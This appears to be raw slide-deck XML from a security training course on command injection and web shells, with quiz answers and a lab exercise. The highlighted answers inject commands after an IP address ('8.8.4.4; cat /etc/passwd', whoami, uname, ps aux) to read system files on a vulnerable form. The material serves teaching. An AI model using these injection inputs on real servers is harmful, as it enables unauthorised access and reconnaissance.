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Thin"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId57"/>
      <p:bold r:id="rId58"/>
      <p:italic r:id="rId59"/>
      <p:boldItalic r:id="rId60"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId61"/>
      <p:bold r:id="rId62"/>
      <p:italic r:id="rId63"/>
      <p:boldItalic r:id="rId64"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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5.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7.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robo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lack-bold.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId58"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597323afd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597323afd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8df1251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8df125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8e070b8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8e070b8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8df1251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8df1251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8df1251c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8df1251c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8df1251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8df1251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597323afd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597323afd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97323afd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97323afd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97323afd7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97323afd7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97323afd7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97323afd7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58e070b8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58e070b8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8e070b8a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8e070b8a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58df1251c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58df1251c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97323afd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97323afd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97323afd7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97323afd7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97323afd7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97323afd7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g597323afd7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597323afd7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97323afd7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97323afd7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97323afd7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97323afd7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58df1251c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58df1251c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6c3c4dd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6c3c4dd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8df1251c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8df1251c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8df1251c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8df1251c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Google Shape;1243;g58df1251c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58df1251c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such as:</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The name of directories/files you don't have read/write access to</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Whether or not certain packages are installed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Configuration information</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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8df1251c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8df1251c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8df1251c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8df1251c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58df1251c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58df1251c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58df1251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8df1251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8e070b8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8e070b8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58df1251c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8df1251c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8df1251c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8df1251c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56c3c4dd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56c3c4dd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58df1251c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8df1251c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8e070b8a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8e070b8a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97323af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97323af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97323afd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97323afd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6" name="Shape 1066"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;g597323afd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597323afd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97323afd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597323afd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97323afd7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97323afd7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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId7"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61.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.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71.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59.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.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72.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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><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82.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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId9"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89.png"/><Relationship Id="rId8"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9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vulnerable.site/shell.ph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vulnerable.site/shell.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Vulnerabilities 2 Day 3</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Command Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>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95" name="Google Shape;109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6" name="Google Shape;1096;p62"/>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097" name="Google Shape;1097;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="1302600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to run commands with sudo? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>No, because sudo requires users to enter a password.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to add or modify a user, or change group membership? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>No, because adding/modifying users requires sudo.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>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457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Maybe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. In the examples we've seen, no, because the server runs as the www-data user, which has a default shell of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/nologin`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>, both of which prevent the user from acquiring an interactive shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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Direct Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103" name="Google Shape;1103;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64"/>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Like SQL Injection, </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>direct command injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> is a method in which user-submitted data (such as a search term sent through a form) </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>is used as part of a shell command.  </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;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5" name="Google Shape;1115;p6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Direct Command Injection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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121" name="Google Shape;112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My First Command Injection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semicolon operator to inject commands to a vulnerable serve.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8" name="Google Shape;1128;p67"/>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My First Command Injection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34" name="Google Shape;1134;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="18270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600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Submit a valid IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to see the form's normal behavior.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use the semicolon to inject commands that:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dump the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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current username</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operating system and kernel version</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all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="18270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600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Submit a valid IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to see the form's normal behavior.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use the semicolon to inject commands that:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dump the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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current username</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the operating system and kernel version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142;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3" name="Google Shape;1143;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197775" y="2766250"/>
            <a:ext cx="9144000" cy="21291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 Dump the contents of `/etc/passwd`</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8.8.4.4; cat /etc/passwd</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 Print the current username</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8.8.4.4; whoami</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 Print the operating system and kernel version</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8.8.4.4; uname</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4; ps aux</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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;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Enable Foxy Proxy, launch Burp Suite, and intercept a request through the IP address form.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
